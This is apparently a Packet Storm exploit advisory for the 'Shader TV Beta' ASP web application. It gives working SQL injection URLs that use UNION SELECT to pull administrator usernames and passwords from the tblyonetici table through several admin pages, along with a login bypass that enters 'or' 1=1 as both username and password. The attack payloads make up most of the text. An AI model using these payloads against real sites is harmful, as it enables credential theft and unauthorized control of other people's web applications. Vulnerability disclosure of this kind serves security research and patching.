Shader TV Beta suffers from multiple SQL injection vulnerabilities allowing for login bypass and more.
c43b2c1b733de28e96f42f0c4b99fa9a6a818f1beb6381495fe83a7b603b102fShader TV (Beta) Multiple Remote SQL İnjection Vulnerable
Script : http://www.aspindir.com/indir.asp?ID=5441
Script : http://rapidshare.de/files/39341463/ShaderTV.zip.html
Coded : Asp
Lnguae : Acces
Discovered By U238 | < Ugurcan Engin >
Friends : ka0x - The_BekiR - Marco Almeida - Erhan Bulut - Caborz :
Web - Designer Solution Developer
setuid.noexec0x1@hotmail.com
http://noexec.blogspot.com
0x1 = [S** Says : Allah Belanı Versin Ulan Şiz0 !]
0x2 = [Ben Sadece İyi Bir İnsan Olmak İstemistim ]
Exploit:
Administrator Login to creative web panel is atack of to SQL injectin.
http://localhost:2222/lab/ShaderTV/yonet/kanal.asp?islem=degistir&sid=13+union+select+0,kullanici,parola,3,4,5+from+tblyonetici
----
http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,parola+from+tblyonetici&sayfa=1
http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,kullanici+from+tblyonetici&sayfa=1
----
http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,parola+from+tblyonetici
http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,kullanici+from+tblyonetici
Administrator Panel :
target/ShaderTV/yonet
-------------------------------
Admin Panel Login Bypass :
target/ShaderTV/yonet/default.asp
username : 'or' 1=1
password : 'or' 1=1
This is Admin Panel See You ?
---------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed